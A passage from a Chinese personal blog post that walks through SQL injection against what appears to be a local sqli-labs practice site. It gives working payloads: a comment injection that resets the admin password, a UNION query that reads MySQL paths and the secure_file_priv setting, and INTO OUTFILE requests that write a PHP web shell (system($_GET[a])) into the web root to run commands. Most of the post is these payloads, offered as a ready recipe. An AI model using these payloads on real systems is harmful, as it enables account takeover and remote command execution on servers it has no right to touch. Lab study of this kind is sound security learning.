<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#原语句</span><br><span class="line">UPDATE users SET PASSWORD=&#x27;$pass&#x27; where username=&#x27;$username&#x27; and password=&#x27;$curr_pass&#x27; </span><br><span class="line"></span><br><span class="line">#插入 payload 后的语句</span><br><span class="line">UPDATE users SET PASSWORD=&#x27;$pass&#x27; where username=&#x27;admin&#x27;-- -&#x27; and password=&#x27;$curr_pass&#x27; </span><br><span class="line">#此时 &#x27;admin&#x27; 后的语句被注释</span><br><span class="line"></span><br><span class="line">#真正的生效的语句</span><br><span class="line">UPDATE users SET PASSWORD=&#x27;$pass&#x27; where username=&#x27;admin&#x27;</span><br><span class="line">#从而达到了修改用户 admin 密码的目的</span><br></pre></td></tr></table></figure>

<h3 id="基于SQL注入拿到webshell"><a href="#基于SQL注入拿到webshell" class="headerlink" title="基于SQL注入拿到webshell"></a>基于SQL注入拿到webshell</h3><p>1，MySQL数据库的配置文件My.ini中的secure_file_priv为空 ，如下， 意思就是不限制数据的导入和导出操作，即能够上传木马文件</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223224626258.png" alt="image-20231223224626258"><br>2，利用SQL注入获取MySQL的地址并且检查secure_file_priv是否为空</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.59:808/sqli/Less-1/?id=-1&#x27; union select 1,@@datadir,@@secure_file_priv -- -</span><br><span class="line"></span><br><span class="line">@@datadir返回MySQL服务器当前正在使用的数据目录的路径。</span><br><span class="line"></span><br><span class="line">@@secure_file_priv它指定了通过LOAD DATA、SELECT ... INTO OUTFILE、和LOAD_FILE()等语句能够访问的目录的路径。</span><br><span class="line"></span><br><span class="line">利用@@datadir和@@secure_file_priv两个函数获取MySQL的绝对路径，password后面没有东西说明secure_file_priv为空</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223224645908.png" alt="image-20231223224645908"></p>
<p>3，在网站的根目录下写入文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.59:808/sqli/Less-1/?id=-1&#x27; union select 1,@@datadir,&quot;&lt;?php phpindo();  ?&gt;&quot; into outfile &quot;C:\\phpStudy_64\\sqli\\WWW\\php1.php&quot; -- -</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223224749613.png" alt="image-20231223224749613"></p>
<p>网站根目录下出现文件说明写入文件成功！</p>
<p>4，注入一句话木马，拿到webs hell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.59:808/sqli/Less-1/?id=-1&#x27; union select 1,@@datadir,&quot;&lt;?php @system($_GET[a]);   ?&gt;&quot; into outfile &quot;C:\\phpStudy_64\\sqli\\WWW\\php2.php&quot; -- -</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>其中@system($_GET[a]);是指以管理员身份运行拿到的a参数中的指令，C:\phpStudy_64\sqli\WWW\php2.php是文件的绝对路径</p>
<p>打开<a target="_blank" rel="noopener" href="http://192.168.2.59:808/php2.php%E6%9C%89%E9%A1%B5%E9%9D%A2%E8%AF%B4%E6%98%8E%E6%B3%A8%E5%85%A5%E6%88%90%E5%8A%9F%EF%BC%81">http://192.168.2.59:808/php2.php有页面说明注入成功！</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223224840701.png" alt="image-20231223224840701"></p>
<p>5，执行指令，例如查看系统信息</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223224847967.png" alt="image-20231223224847967"></p>

    </div>
    
    
    
    
    
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2024 k-onlの狗窝
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;k-onl
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    




    
</body>
</html>
